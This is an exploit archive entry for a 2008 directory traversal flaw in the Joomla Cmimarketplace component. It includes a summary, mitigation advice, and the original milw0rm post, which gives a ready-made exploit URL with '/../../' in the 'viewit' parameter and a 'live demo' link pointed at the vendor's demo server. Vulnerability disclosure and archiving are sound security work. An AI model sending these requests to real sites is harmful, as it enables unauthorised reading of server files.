Joomla Component Cmimarketplace Directory Traversal Vulnerability

vendor:

Cmimarketplace

by:

H!tm@N

7.5

CVSS

HIGH

Directory Traversal

CWE

Product Name: Cmimarketplace

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: a:magnetic_merchandising_inc:cmimarketplace

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component Cmimarketplace Directory Traversal Vulnerability

A Directory Traversal vulnerability was discovered in Joomla Component Cmimarketplace. An attacker can exploit this vulnerability to gain access to sensitive files and directories stored on the server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'viewit' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '/../../') to the vulnerable script. Successful exploitation of this vulnerability may result in unauthorized access to sensitive files and directories stored on the server.

Mitigation:

The vendor has released an update to address this vulnerability. Users are advised to update to the latest version of the component.

Source

Exploit-DB raw data:

#############################################################################
#							                    #
#     Joomla Component Cmimarketplace Directory Traversal Vulnerability     #
#							                    #
#############################################################################


########################################

[~] Vulnerability found by: H!tm@N
[~] Contact: khghitman[at]gmail[dot]com
[~] Site: www.khg-crew.ws
[~] Greetz: boom3rang, KHG, chs, redc00de 
[~]         -=[Kosova Hackers Group]=--=[KHG-Crew]=-

########################################

[~] ScriptName:    "Joomla"
[~] Component:     "Cmimarketplace (com_cmimarketplace)"  
[~] Date:          "August 2008"
[~] Author:        "Magnetic Merchandising Inc."
[~] E-mail:        "client@ijobid.com"
[~] Author URL:    "www.ijobid.com"

########################################

[~] Exploit: /index.php?option=com_cmimarketplace&Itemid=70&viewit=[Directory]&cid=1

[~] Example: /index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1

########################################

[~] Live Demo: http://democmi.ijobid.com/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../&cid=1

########################################

[~] Proud 2 be Albanian
[~] Proud 2 be Muslim
[~] R.I.P redc00de

########################################

# milw0rm.com [2009-04-08]